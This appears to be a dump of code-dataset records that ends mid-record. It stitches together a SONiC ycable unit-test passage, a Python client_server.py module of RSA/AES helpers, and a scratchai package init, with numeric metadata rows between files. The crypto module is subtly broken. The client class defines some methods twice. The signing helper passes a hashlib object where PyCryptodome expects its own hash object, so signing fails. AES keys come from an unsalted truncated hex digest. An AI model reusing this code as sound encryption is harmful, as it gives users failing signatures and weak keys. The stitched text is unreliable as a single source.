fvp = {"config": "active"}
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
self.TARGET_NIC = 1
self.TARGET_TOR_A = 1
self.TARGET_TOR_B = 1
self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
self.download_firmware_status = 0
self.SWITCH_COUNT_MANUAL = "manual"
self.SWITCH_COUNT_AUTO = 0
self.SWITCHING_MODE_MANUAL = 0
self.SWITCHING_MODE_AUTO = 1
def get_read_side(self):
return 1
def get_switching_mode(self):
return 0
# Defining function without self argument creates an exception,
# which is what we want for this test.
def get_mux_direction():
pass
patched_util.get.return_value = PortInstanceHelper()
rc = handle_config_hwmode_state_cmd_arg_tbl_notification(
fvp, xcvrd_config_hwmode_state_cmd_sts_tbl, xcvrd_config_hwmode_state_rsp_tbl, asic_index, port)
assert(rc == None)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_mux_state_cmd_arg_tbl_notification_no_instance(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_hwmode_state_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_hwmode_state_rsp_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
fvp = {"config": "active"}
rc = handle_config_hwmode_state_cmd_arg_tbl_notification(
fvp, xcvrd_config_hwmode_state_cmd_sts_tbl, xcvrd_config_hwmode_state_rsp_tbl, asic_index, port)
assert(rc == -1)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "activate_firmware", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
@patch('time.sleep', MagicMock(return_value=True))
def test_handle_config_mux_state_cmd_arg_tbl_notification_with_instance_auto(self, mock_swsscommon_table, platform_sfputil):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_hwmode_state_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_hwmode_state_rsp_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
platform_sfputil.get_asic_id_for_logical_port = 0
fvp = {"config": "active"}
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
self.TARGET_NIC = 1
self.TARGET_TOR_A = 1
self.TARGET_TOR_B = 1
self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
self.download_firmware_status = 0
self.SWITCH_COUNT_MANUAL = "manual"
self.SWITCH_COUNT_AUTO = "auto"
self.SWITCHING_MODE_MANUAL = 0
self.SWITCHING_MODE_AUTO = 1
def get_read_side(self):
return 1
def get_switching_mode(self):
return 1
# Defining function without self argument creates an exception,
# which is what we want for this test.
def get_mux_direction():
pass
patched_util.get.return_value = PortInstanceHelper()
rc = handle_config_hwmode_state_cmd_arg_tbl_notification(
fvp, xcvrd_config_hwmode_state_cmd_sts_tbl, xcvrd_config_hwmode_state_rsp_tbl, asic_index, port)
assert(rc == None)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_show_mux_state_cmd_arg_tbl_notification_no_port(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_show_hwmode_dir_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_hwmode_dir_rsp_tbl = mock_swsscommon_table
xcvrd_show_hwmode_dir_res_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
fvp = {"state": "active"}
rc = handle_show_hwmode_state_cmd_arg_tbl_notification(
fvp, xcvrd_show_hwmode_dir_cmd_sts_tbl, xcvrd_show_hwmode_dir_rsp_tbl, xcvrd_show_hwmode_dir_res_tbl, asic_index, port)
assert(rc == -1)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_show_mux_state_cmd_arg_tbl_notification_else_condition(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_show_hwmode_dir_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_hwmode_dir_rsp_tbl = mock_swsscommon_table
xcvrd_show_hwmode_dir_res_tbl = mock_swsscommon_table
xcvrd_config_hwmode_state_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_hwmode_state_rsp_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
fvp = {"down_firmware": "null"}
rc = handle_show_hwmode_state_cmd_arg_tbl_notification(
fvp, xcvrd_show_hwmode_dir_cmd_sts_tbl, xcvrd_show_hwmode_dir_rsp_tbl, xcvrd_show_hwmode_dir_res_tbl, asic_index, port)
assert(rc == None)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "activate_firmware", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
@patch('time.sleep', MagicMock(return_value=True))
def test_handle_show_mux_state_cmd_arg_tbl_notification_with_instance_manual(self, mock_swsscommon_table, platform_sfputil):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_show_hwmode_dir_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_hwmode_dir_rsp_tbl = mock_swsscommon_table
xcvrd_show_hwmode_dir_res_tbl = mock_swsscommon_table
xcvrd_config_hwmode_state_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_hwmode_state_rsp_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
platform_sfputil.get_asic_id_for_logical_port = 0
fvp = {"state": "active"}
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
self.TARGET_NIC = 1
self.TARGET_TOR_A = 1
self.TARGET_TOR_B = 1
self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
self.download_firmware_status = 0
self.SWITCH_COUNT_MANUAL = "manual"
self.SWITCH_COUNT_AUTO = 0
self.SWITCHING_MODE_MANUAL = 0
self.SWITCHING_MODE_AUTO = 1
def get_read_side(self):
return 1
def get_mux_direction(self):
return 1
def get_switching_mode(self):
return 0
patched_util.get.return_value = PortInstanceHelper()
rc = handle_show_hwmode_state_cmd_arg_tbl_notification(
fvp, xcvrd_show_hwmode_dir_cmd_sts_tbl, xcvrd_show_hwmode_dir_rsp_tbl, xcvrd_show_hwmode_dir_res_tbl, asic_index, port)
assert(rc == None)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_show_mux_state_cmd_arg_tbl_notification_no_instance(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_show_hwmode_dir_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_hwmode_dir_rsp_tbl = mock_swsscommon_table
xcvrd_show_hwmode_dir_res_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
fvp = {"state": "active"}
rc = handle_show_hwmode_state_cmd_arg_tbl_notification(
fvp, xcvrd_show_hwmode_dir_cmd_sts_tbl, xcvrd_show_hwmode_dir_rsp_tbl, xcvrd_show_hwmode_dir_res_tbl, asic_index, port)
assert(rc == -1)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "activate_firmware", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
@patch('time.sleep', MagicMock(return_value=True))
def test_handle_show_mux_state_cmd_arg_tbl_notification_with_instance_auto(self, mock_swsscommon_table, platform_sfputil):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_config_hwmode_state_cmd_sts_tbl = mock_swsscommon_table
xcvrd_config_hwmode_state_rsp_tbl = mock_swsscommon_table
xcvrd_show_hwmode_dir_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_hwmode_dir_rsp_tbl = mock_swsscommon_table
xcvrd_show_hwmode_dir_res_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
platform_sfputil.get_asic_id_for_logical_port = 0
fvp = {"state": "active"}
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
self.TARGET_NIC = 1
self.TARGET_TOR_A = 1
self.TARGET_TOR_B = 1
self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
self.download_firmware_status = 0
self.SWITCH_COUNT_MANUAL = "manual"
self.SWITCH_COUNT_AUTO = "auto"
self.SWITCHING_MODE_MANUAL = 0
self.SWITCHING_MODE_AUTO = 1
def get_read_side(self):
return 1
def get_switching_mode(self):
return 1
def get_mux_direction(self):
return 2
patched_util.get.return_value = PortInstanceHelper()
rc = handle_show_hwmode_state_cmd_arg_tbl_notification(
fvp, xcvrd_show_hwmode_dir_cmd_sts_tbl, xcvrd_show_hwmode_dir_rsp_tbl, xcvrd_show_hwmode_dir_res_tbl, asic_index, port)
assert(rc == None)
| 52.190507
| 160
| 0.63016
| 28,574
| 244,095
| 4.868902
| 0.013334
| 0.045025
| 0.047698
| 0.086657
| 0.966914
| 0.962501
| 0.957405
| 0.951267
| 0.948736
| 0.946213
| 0
| 0.010766
| 0.288404
| 244,095
| 4,676
| 161
| 52.201668
| 0.790192
| 0.005043
| 0
| 0.892984
| 0
| 0
| 0.215549
| 0.174825
| 0
| 0
| 0
| 0
| 0.071526
| 1
| 0.085449
| false
| 0.004368
| 0.003276
| 0.021294
| 0.120393
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
65013262edc489f6c25cf54b98d7088a57f7ac87
| 19,177
|
py
|
Python
|
client_server.py
|
shahafashash/protocols
|
4d953dfb39d976d33628778673f6aae1b0235750
|
[
"MIT"
] | null | null | null |
client_server.py
|
shahafashash/protocols
|
4d953dfb39d976d33628778673f6aae1b0235750
|
[
"MIT"
] | null | null | null |
client_server.py
|
shahafashash/protocols
|
4d953dfb39d976d33628778673f6aae1b0235750
|
[
"MIT"
] | null | null | null |
from abc import ABCMeta, abstractmethod
from socket import socket, AF_INET, SOCK_STREAM
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP, AES
from Crypto.Signature.pkcs1_15 import PKCS115_SigScheme
from Crypto.Util.Padding import pad, unpad
from hashlib import sha512
from pathlib import Path
from secrets import token_bytes
from base64 import b64encode, b64decode
class Client(metaclass=ABCMeta):
def __init__(self) -> None:
"""Instantiate a client object"""
self.__conn = None
@property
def conn(self) -> socket:
"""Returns the socket representing the connection with the server
Returns:
socket: Connection with the server
"""
return self.__conn
def connect_to_server(self, host='127.0.0.1', port=1234) -> bool:
"""Connect to server with the given host address on the given port
Args:
host (str, optional): IP or URL address of the server. Defaults to '127.0.0.1'.
port (int, optional): Port the server will listen to. Defaults to 1234.
Returns:
bool: 'True' if handshake established successfully and 'False' if not
"""
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
self.__conn = s
result = self.do_handshake()
if result == True:
return True
else:
self.__conn = None
return False
def send_message(self, message: str) -> None:
"""Send a message to the server
Args:
message (str): Message to send to server
"""
self.__conn.send(message.encode('utf-8'))
def recieve_message(self) -> str:
"""Recieve a message from the server
Returns:
str: Message recived from the server
"""
message = self.__conn.recv(1024).decode('utf-8')
return message
@abstractmethod
def do_handshake(self) -> bool:
"""Hook function - Handshake before establishing a connection
Returns:
bool: 'True' if handshake established successfully and 'False' if not
"""
# no handshake
return True
def recieve_message(self) -> str:
"""Recieve a message from the client
Returns:
str: Message recived from the client
"""
message = self.__conn.recv(1024).decode('utf-8')
return message
@abstractmethod
def do_handshake(self) -> bool:
"""Hook function - Handshake before establishing a connection
Returns:
bool: 'True' if connection established successfully and 'False' if not
"""
# no handshake
return True
def generate_rsa_keys(self, size=2048) -> RSA.RsaKey:
"""Generates RSA keys with a given size
Args:
size (int, optional): Size of keys in bits. Defaults to 2048.
Sizes: 1536bit, 2048bit, 3072bit, 4096bit, 6144bit, 8192bit
Raises:
ValueError: If given size is not supported
Returns:
RSA.RsaKey: Pair of RSA private and public keys
"""
valid_sizes = [1024, 2048, 3072, 4096, 6144, 8192]
if size not in valid_sizes:
raise ValueError(f'Key size is not valid: {size}')
key_pair = RSA.generate(size)
return key_pair
def rsa_encrypt_message(self, message: str, pub_key: RSA.RsaKey) -> bytes:
"""Encrypts the given message using RSA
Args:
message (str): Message to encrypt
pub_key (RSA.RsaKey): Public RSA key
Returns:
bytes: Encrypted message
"""
# convert string to bytes
msg = message.encode('utf-8')
# encrypt message
encryptor = PKCS1_OAEP.new(pub_key)
encrypted = encryptor.encrypt(msg)
return encrypted
def rsa_decrypt_message(self, enc_message: bytes, key_pair: RSA.RsaKey) -> str:
"""Decrypts the given message using RSA
Args:
enc_message (bytes): Encrypted message
key_pair (RSA.RsaKey): RSA key pair of private and public keys
Returns:
str: Decrypted message
"""
# decrypt message
decryptor = PKCS1_OAEP.new(key_pair)
decrypted = decryptor.decrypt(enc_message)
# convert bytes to string
message = decrypted.decode('utf-8')
return message
def rsa_sign_message(self, message: bytes, key_pair: RSA.RsaKey) -> bytes:
"""Sign a given message using PKCS#1 standard version 1.5
Args:
message (bytes): Message to sign
key_pair (RSA.RsaKey): RSA key pair of private and public keys
Returns:
bytes: Signed message
"""
hash = sha512(message)
signer = PKCS115_SigScheme(key_pair)
signature = signer.sign(hash)
return signature
def rsa_verify_signature(self, message: bytes, signature: int, pub_key: RSA.RsaKey) -> bool:
"""Verify message signature using PKCS#1 standard version 1.5
Args:
message (bytes): Message to compare
signature (int): Signed message
pub_key (RSA.RsaKey): Public RSA key
Returns:
bool: 'True' if signature is valid and 'False' it not
"""
hash = sha512(message)
verifier = PKCS115_SigScheme(pub_key)
try:
verifier.verify(hash, signature)
status = True
except:
status = False
return status
def rsa_import_key(self, key_file: str) -> RSA.RsaKey:
"""Import RSA key from a given key file
Args:
key_file (str): Path to RSA key file
Raises:
FileNotFoundError: If file does not exist
Returns:
RSA.RsaKey: RSA key pair
"""
key_file_obj = Path(key_file).resolve()
if not key_file_obj.exists():
raise FileNotFoundError(f'File does not exist: {str(key_file_obj)}')
with key_file_obj.open('r') as f:
key = RSA.import_key(f.read())
return key
def rsa_export_key(self, key_file: str, key: RSA.RsaKey) -> None:
"""Export RSA key to file
Args:
key_file (str): Path to RSA key file
key (RSA.RsaKey): RSA key to export
"""
key_file_obj = Path(key_file).resolve()
key_file_obj.parent.mkdir(parents=True, exist_ok=True)
with key_file_obj.open('wb') as f:
f.write(key.export_key())
def aes_generate_iv(self) -> bytes:
"""Generates random 16 bytes initialization vector (IV)
Returns:
bytes: Initialization vector
"""
iv = token_bytes(16)
return iv
def aes_generate_key(self, seed: str, block_size=256) -> bytes:
"""Generates AES key from a given seed with default block size of 256 bits.
Key size is being determined by the 'block_size' variable.
Args:
seed (str): String to generate a key from
block_size (int, optional): Key size in bits (128, 192 or 256). Defaults to 256.
Raises:
ValueError: If block size is not valid
Returns:
bytes: AES key with size 'block_size'
"""
valid_sizes = [128, 192, 256]
if block_size not in valid_sizes:
raise ValueError(f'Block size is not valid: {block_size}')
key = sha512(seed.encode('utf-8')).hexdigest()[:(block_size//8)]
key = key.encode('utf-8')
return key
def aes_encrypt_message(self, message: str, key: bytes, iv: bytes, block_size=256) -> bytes:
"""Encrypts the given message using AES in CBC mode and the given key and IV.
Args:
message (str): Message to encrypt
key (bytes): AES key
iv (bytes): 16 bytes initialization vetor
block_size (int, optional): Block size in bits (128, 192 or 256). Defaults to 256.
Raises:
ValueError: If block size is not valid
ValueError: If IV is not 16 bytes
Returns:
bytes: Encrypted message and IV
"""
valid_sizes = [128, 192, 256]
if block_size not in valid_sizes:
raise ValueError(f'Block size is not valid: {block_size}')
elif len(iv) != 16:
raise ValueError(f'Invalid IV size: {len(iv)}bytes')
msg = message.encode('utf-8')
padded_message = pad(msg, block_size)
encryptor = AES.new(key, AES.MODE_CBC, iv)
encrypted = encryptor.encrypt(padded_message)
enc_message = b64encode(iv + encrypted)
return enc_message
def aes_decrypt_message(self, enc_message: bytes, key: bytes, block_size=256) -> str:
"""Decrypts the given message using AES in CBC mode and the given key and IV.
Args:
enc_message (bytes): Message to decrypt
key (bytes): AES key
block_size (int, optional): Block size in bits (128, 192 or 256). Defaults to 256.
Raises:
ValueError: If block size is not valid
Returns:
str: Decrypted message
"""
valid_sizes = [128, 192, 256]
if block_size not in valid_sizes:
raise ValueError(f'Block size is not valid: {block_size}')
_enc_message = b64decode(enc_message)
iv = _enc_message[:16]
decryptor = AES.new(key, AES.MODE_CBC, iv)
decrypted = decryptor.decrypt(_enc_message[16:])
message = unpad(decrypted, block_size)
message = message.decode('utf-8')
return message
class Server(metaclass=ABCMeta):
def __init__(self, host='127.0.0.1', port=1234) -> None:
"""Instantiate a server object
Args:
host (str, optional): IP or URL address of the server. Defaults to '127.0.0.1'.
port (int, optional): Port the server will listen to. Defaults to 1234.
"""
self.__host = host
self.__port = port
self.__conn = None
@property
def host(self) -> str:
"""Return the servers address (ip or url)
Returns:
str: IP address or URL address
"""
return self.__host
@property
def port(self) -> int:
"""Returns the port the server listens to
Returns:
int: Port number
"""
return self.__port
@property
def conn(self) -> socket:
"""Returns the socket representing the connection with the client
Returns:
socket: Connection with the client
"""
return self.__conn
def wait_for_connection(self) -> bool:
"""Blocking method - Waiting for a connection from a client
Returns:
bool: 'True' if handshake established successfully and 'False' if not
"""
with socket(AF_INET, SOCK_STREAM) as s:
s.bind((self.__host, self.__port))
s.listen()
conn, addr = s.accept()
self.__conn = conn
print(f'Connected by: {addr}')
result = self.do_handshake()
if result == True:
return True
else:
self.__conn = None
return False
def send_message(self, message: str) -> None:
"""Send a message to the client
Args:
message (str): Message to send to client
"""
self.__conn.send(message.encode('utf-8'))
def recieve_message(self) -> str:
"""Recieve a message from the client
Returns:
str: Message recived from the client
"""
message = self.__conn.recv(1024).decode('utf-8')
return message
@abstractmethod
def do_handshake(self) -> bool:
"""Hook function - Handshake before establishing a connection
Returns:
bool: 'True' if connection established successfully and 'False' if not
"""
# no handshake
return True
def generate_rsa_keys(self, size=2048) -> RSA.RsaKey:
"""Generates RSA keys with a given size
Args:
size (int, optional): Size of keys in bits. Defaults to 2048.
Sizes: 1536bit, 2048bit, 3072bit, 4096bit, 6144bit, 8192bit
Raises:
ValueError: If given size is not supported
Returns:
RSA.RsaKey: Pair of RSA private and public keys
"""
valid_sizes = [1024, 2048, 3072, 4096, 6144, 8192]
if size not in valid_sizes:
raise ValueError(f'Key size is not valid: {size}')
key_pair = RSA.generate(size)
return key_pair
def rsa_encrypt_message(self, message: str, pub_key: RSA.RsaKey) -> bytes:
"""Encrypts the given message using RSA
Args:
message (str): Message to encrypt
pub_key (RSA.RsaKey): Public RSA key
Returns:
bytes: Encrypted message
"""
# convert string to bytes
msg = message.encode('utf-8')
# encrypt message
encryptor = PKCS1_OAEP.new(pub_key)
encrypted = encryptor.encrypt(msg)
return encrypted
def rsa_decrypt_message(self, enc_message: bytes, key_pair: RSA.RsaKey) -> str:
"""Decrypts the given message using RSA
Args:
enc_message (bytes): Encrypted message
key_pair (RSA.RsaKey): RSA key pair of private and public keys
Returns:
str: Decrypted message
"""
# decrypt message
decryptor = PKCS1_OAEP.new(key_pair)
decrypted = decryptor.decrypt(enc_message)
# convert bytes to string
message = decrypted.decode('utf-8')
return message
def rsa_sign_message(self, message: bytes, key_pair: RSA.RsaKey) -> bytes:
"""Sign a given message using PKCS#1 standard version 1.5
Args:
message (bytes): Message to sign
key_pair (RSA.RsaKey): RSA key pair of private and public keys
Returns:
bytes: Signed message
"""
hash = sha512(message)
signer = PKCS115_SigScheme(key_pair)
signature = signer.sign(hash)
return signature
def rsa_verify_signature(self, message: bytes, signature: int, pub_key: RSA.RsaKey) -> bool:
"""Verify message signature using PKCS#1 standard version 1.5
Args:
message (bytes): Message to compare
signature (int): Signed message
pub_key (RSA.RsaKey): Public RSA key
Returns:
bool: 'True' if signature is valid and 'False' it not
"""
hash = sha512(message)
verifier = PKCS115_SigScheme(pub_key)
try:
verifier.verify(hash, signature)
status = True
except:
status = False
return status
def rsa_import_key(self, key_file: str) -> RSA.RsaKey:
"""Import RSA key from a given key file
Args:
key_file (str): Path to RSA key file
Raises:
FileNotFoundError: If file does not exist
Returns:
RSA.RsaKey: RSA key pair
"""
key_file_obj = Path(key_file).resolve()
if not key_file_obj.exists():
raise FileNotFoundError(f'File does not exist: {str(key_file_obj)}')
with key_file_obj.open('r') as f:
key = RSA.import_key(f.read())
return key
def rsa_export_key(self, key_file: str, key: RSA.RsaKey) -> None:
"""Export RSA key to file
Args:
key_file (str): Path to RSA key file
key (RSA.RsaKey): RSA key to export
"""
key_file_obj = Path(key_file).resolve()
key_file_obj.parent.mkdir(parents=True, exist_ok=True)
with key_file_obj.open('wb') as f:
f.write(key.export_key())
def aes_generate_iv(self) -> bytes:
"""Generates random 16 bytes initialization vector (IV)
Returns:
bytes: Initialization vector
"""
iv = token_bytes(16)
return iv
def aes_generate_key(self, seed: str, block_size=256) -> bytes:
"""Generates AES key from a given seed with default block size of 256 bits.
Key size is being determined by the 'block_size' variable.
Args:
seed (str): String to generate a key from
block_size (int, optional): Key size in bits (128, 192 or 256). Defaults to 256.
Raises:
ValueError: If block size is not valid
Returns:
bytes: AES key with size 'block_size'
"""
valid_sizes = [128, 192, 256]
if block_size not in valid_sizes:
raise ValueError(f'Block size is not valid: {block_size}')
key = sha512(seed.encode('utf-8')).hexdigest()[:(block_size//8)]
key = key.encode('utf-8')
return key
def aes_encrypt_message(self, message: str, key: bytes, iv: bytes, block_size=256) -> bytes:
"""Encrypts the given message using AES in CBC mode and the given key and IV.
Args:
message (str): Message to encrypt
key (bytes): AES key
iv (bytes): 16 bytes initialization vetor
block_size (int, optional): Block size in bits (128, 192 or 256). Defaults to 256.
Raises:
ValueError: If block size is not valid
ValueError: If IV is not 16 bytes
Returns:
bytes: Encrypted message and IV
"""
valid_sizes = [128, 192, 256]
if block_size not in valid_sizes:
raise ValueError(f'Block size is not valid: {block_size}')
elif len(iv) != 16:
raise ValueError(f'Invalid IV size: {len(iv)}bytes')
msg = message.encode('utf-8')
padded_message = pad(msg, block_size)
encryptor = AES.new(key, AES.MODE_CBC, iv)
encrypted = encryptor.encrypt(padded_message)
enc_message = b64encode(iv + encrypted)
return enc_message
def aes_decrypt_message(self, enc_message: bytes, key: bytes, block_size=256) -> str:
"""Decrypts the given message using AES in CBC mode and the given key and IV.
Args:
enc_message (bytes): Message to decrypt
key (bytes): AES key
block_size (int, optional): Block size in bits (128, 192 or 256). Defaults to 256.
Raises:
ValueError: If block size is not valid
Returns:
str: Decrypted message
"""
valid_sizes = [128, 192, 256]
if block_size not in valid_sizes:
raise ValueError(f'Block size is not valid: {block_size}')
_enc_message = b64decode(enc_message)
iv = _enc_message[:16]
decryptor = AES.new(key, AES.MODE_CBC, iv)
decrypted = decryptor.decrypt(_enc_message[16:])
message = unpad(decrypted, block_size)
message = message.decode('utf-8')
return message
| 31.489327
| 96
| 0.585597
| 2,385
| 19,177
| 4.589518
| 0.091405
| 0.042755
| 0.013155
| 0.017906
| 0.91586
| 0.896583
| 0.893751
| 0.888452
| 0.884433
| 0.884433
| 0
| 0.033437
| 0.327841
| 19,177
| 608
| 97
| 31.541118
| 0.815749
| 0.383167
| 0
| 0.862222
| 0
| 0
| 0.055194
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.168889
| false
| 0
| 0.062222
| 0
| 0.391111
| 0.004444
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
65109d14f490c866e5ef11809f59491d1d0a5d2c
| 157
|
py
|
Python
|
scratchai/nets/clf/__init__.py
|
y0un35/scratchai
|
f534bdd13ce0efd26d1e3ab423a98f0b2cdcd938
|
[
"MIT"
] | 2
|
2019-07-15T16:26:31.000Z
|
2020-05-26T09:40:30.000Z
|
scratchai/nets/clf/__init__.py
|
y0un35/scratchai
|
f534bdd13ce0efd26d1e3ab423a98f0b2cdcd938
|
[
"MIT"
] | null | null | null |
scratchai/nets/clf/__init__.py
|
y0un35/scratchai
|
f534bdd13ce0efd26d1e3ab423a98f0b2cdcd938
|
[
"MIT"
] | null | null | null |
from scratchai.nets.clf.lenet import *
from scratchai.nets.clf.alexnet import *
from scratchai.nets.clf.resnet import *
from scratchai.nets.clf.vgg import *
| 31.4
| 40
| 0.796178
| 24
| 157
| 5.208333
| 0.375
| 0.416
| 0.544
| 0.64
| 0.624
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101911
| 157
| 4
| 41
| 39.25
| 0.886525
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
6511e0861e3d5b0d8a6476dd48a9579b01a54854
| 493
|
py
|
Python
|
notebook_tester.py
|
jessmuir/DESI-HighSchool
|
b96e505f72d7f61492fd2faeca0d4ba389a463ef
|
[
"BSD-3-Clause"
] | null | null | null |
notebook_tester.py
|
jessmuir/DESI-HighSchool
|
